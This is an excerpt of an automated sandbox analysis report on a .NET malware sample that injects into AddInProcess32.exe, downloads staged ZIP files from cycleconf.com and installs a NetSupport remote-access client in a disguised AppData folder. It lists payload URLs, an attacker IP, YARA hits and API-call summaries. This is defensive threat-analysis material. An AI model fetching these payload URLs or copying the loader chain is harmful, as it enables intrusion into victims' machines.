                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.00000000010E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso8
                                Source: TCCTL32.DLL.4.dr, PCICL32.DLL.4.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: client32.exe, 00000007.00000002.3302419274.0000000002375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com
                                Source: client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000007.00000003.3181897720.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3303235612.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3182065927.0000000003349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspe
                                Source: client32.exe, 00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asph
                                Source: client32.exe, 00000007.00000002.3301652835.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asplB.bg1
                                Source: client32.exe, 00000007.00000002.3302419274.0000000002375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.comlocation/loca.asp
                                Source: TCCTL32.DLL.4.dr, PCICL32.DLL.4.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: remcmdstub.exe.4.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: http://s2.symcb.com0
                                Source: TCCTL32.DLL.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt0
                                Source: remcmdstub.exe.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
                                Source: PCICL32.DLL.4.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: PCICL32.DLL.4.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: PCICL32.DLL.4.drString found in binary or memory: http://sf.symcd.com0&
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: http://sv.symcd.com0&
                                Source: TCCTL32.DLL.4.dr, PCICL32.DLL.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: TCCTL32.DLL.4.dr, PCICL32.DLL.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: TCCTL32.DLL.4.dr, PCICL32.DLL.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr, TCCTL32.DLL.4.drString found in binary or memory: http://www.crossteccorp.com
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://www.globalsign.net/repository/0
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://www.globalsign.net/repository09
                                Source: client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: PCICL32.DLL.4.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/Q)
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/Z)
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_1.zip
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_1.zip2
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_2.zip
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_2.zip5
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_3.zip
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_4.zip
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cycleconf.com/dwnld/2nd2_4.zip2
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, PCICL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, PCICL32.DLL.4.dr, pcicapi.dll.4.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: TCCTL32.DLL.4.dr, remcmdstub.exe.4.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: TCCTL32.DLL.4.drString found in binary or memory: https://www.globalsign.com/repository/03
                                Source: remcmdstub.exe.4.drString found in binary or memory: https://www.globalsign.com/repository/06
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                                Source: unknownHTTPS traffic detected: 23.254.224.41:443 -> 192.168.2.5:49831 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F350
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F350
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11032870 GetClipboardFormatNameA,SetClipboardData,7_2_11032870
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,9_2_1101F350
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11032870 GetClipboardFormatNameA,SetClipboardData,9_2_11032870
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11031B70 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,7_2_11031B70
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,7_2_110076F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,7_2_11110930
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,9_2_11110930
                                Source: Yara matchFile source: 7.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 828, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6044, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,7_2_11112960
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,9_2_11112960

                                System Summary

                                barindex
                                .NET source code contains very large array initializations
                                Source: Jjv9ha2GKn.exe, n2P6H.csLarge array initialization: Cd02: array initializer size 3356
                                Source: Jjv9ha2GKn.exe, Qm7j5.csLarge array initialization: Qm7j5: array initializer size 3868
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110A9020: DeviceIoControl,7_2_110A9020
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075DACA0 CreateProcessAsUserW,0_2_075DACA0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D1B3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE84
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CD90
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_00A900400_2_00A90040
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_026F89F80_2_026F89F8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_026F7C200_2_026F7C20
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05B9D7F80_2_05B9D7F8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05B9AE6C0_2_05B9AE6C
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_05B9D8080_2_05B9D808
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07151D300_2_07151D30
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719AF500_2_0719AF50
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719BB700_2_0719BB70
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07195E780_2_07195E78
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07199EB80_2_07199EB8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_071915480_2_07191548
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719CDB00_2_0719CDB0
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719DC600_2_0719DC60
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719EB380_2_0719EB38
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719BB250_2_0719BB25
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719EB480_2_0719EB48
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719E7410_2_0719E741
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719C3E90_2_0719C3E9
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719F6190_2_0719F619
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719F6280_2_0719F628
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719F9180_2_0719F918
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719001F0_2_0719001F
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719DC2B0_2_0719DC2B
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_071900400_2_07190040
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719FCD00_2_0719FCD0
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_0719FCC00_2_0719FCC0
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_071914E60_2_071914E6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D5F000_2_075D5F00
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D37900_2_075D3790
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D52600_2_075D5260
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075DB2200_2_075DB220
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D04600_2_075D0460
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D10100_2_075D1010
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D0F950_2_075D0F95
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D37800_2_075D3780
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D47A80_2_075D47A8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D524F0_2_075D524F
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075DF6100_2_075DF610
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D02B80_2_075D02B8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D02A80_2_075D02A8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D95600_2_075D9560
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D8DF80_2_075D8DF8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D04530_2_075D0453
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D00400_2_075D0040
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D00060_2_075D0006
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D7C000_2_075D7C00
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_075D54FB0_2_075D54FB
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07AF27600_2_07AF2760
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07AFAA240_2_07AFAA24
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07AF27500_2_07AF2750
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07AFC6900_2_07AFC690
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07B326F80_2_07B326F8
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07B3D7900_2_07B3D790
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07B3D77F0_2_07B3D77F
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07B3D7590_2_07B3D759
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeCode function: 0_2_07151D050_2_07151D05
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004010004_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004069E04_2_004069E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00401A804_2_00401A80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004014204_2_00401420
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004178674_2_00417867
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004061204_2_00406120
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040BAFC4_2_0040BAFC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00404B404_2_00404B40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004123404_2_00412340
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00403C204_2_00403C20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00405D404_2_00405D40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004045804_2_00404580
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004127EB4_2_004127EB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00402FB04_2_00402FB0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110292007_2_11029200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110612D07_2_110612D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110724D07_2_110724D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1102B1F07_2_1102B1F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1115B0907_2_1115B090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1106F2007_2_1106F200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1107F5907_2_1107F590
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1115F9007_2_1115F900
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1101B9507_2_1101B950
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11163B657_2_11163B65
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1101BD907_2_1101BD90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110503E07_2_110503E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110329A07_2_110329A0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_111228607_2_11122860
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1100887B7_2_1100887B
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11044B907_2_11044B90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1101CBB07_2_1101CBB0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11086D607_2_11086D60
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD4A9807_2_6CD4A980
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD73DB87_2_6CD73DB8
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD749107_2_6CD74910
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD739237_2_6CD73923
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD4DBA07_2_6CD4DBA0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD584F07_2_6CD584F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD745287_2_6CD74528
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD417607_2_6CD41760
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD6D70F7_2_6CD6D70F
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD7A0637_2_6CD7A063
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD741567_2_6CD74156
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD643C07_2_6CD643C0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD413107_2_6CD41310
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE06E247_2_6CE06E24
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE06E287_2_6CE06E28
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE66E187_2_6CE66E18
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE209197_2_6CE20919
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE809157_2_6CE80915
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE3EB1A7_2_6CE3EB1A
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE084687_2_6CE08468
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE145AE7_2_6CE145AE
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE967FF7_2_6CE967FF
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE6E7F17_2_6CE6E7F1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110612D09_2_110612D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1102B1F09_2_1102B1F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1115B0909_2_1115B090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110292009_2_11029200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1106F2009_2_1106F200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1107F5909_2_1107F590
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1115F9009_2_1115F900
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1101B9509_2_1101B950
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11163B659_2_11163B65
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1101BD909_2_1101BD90
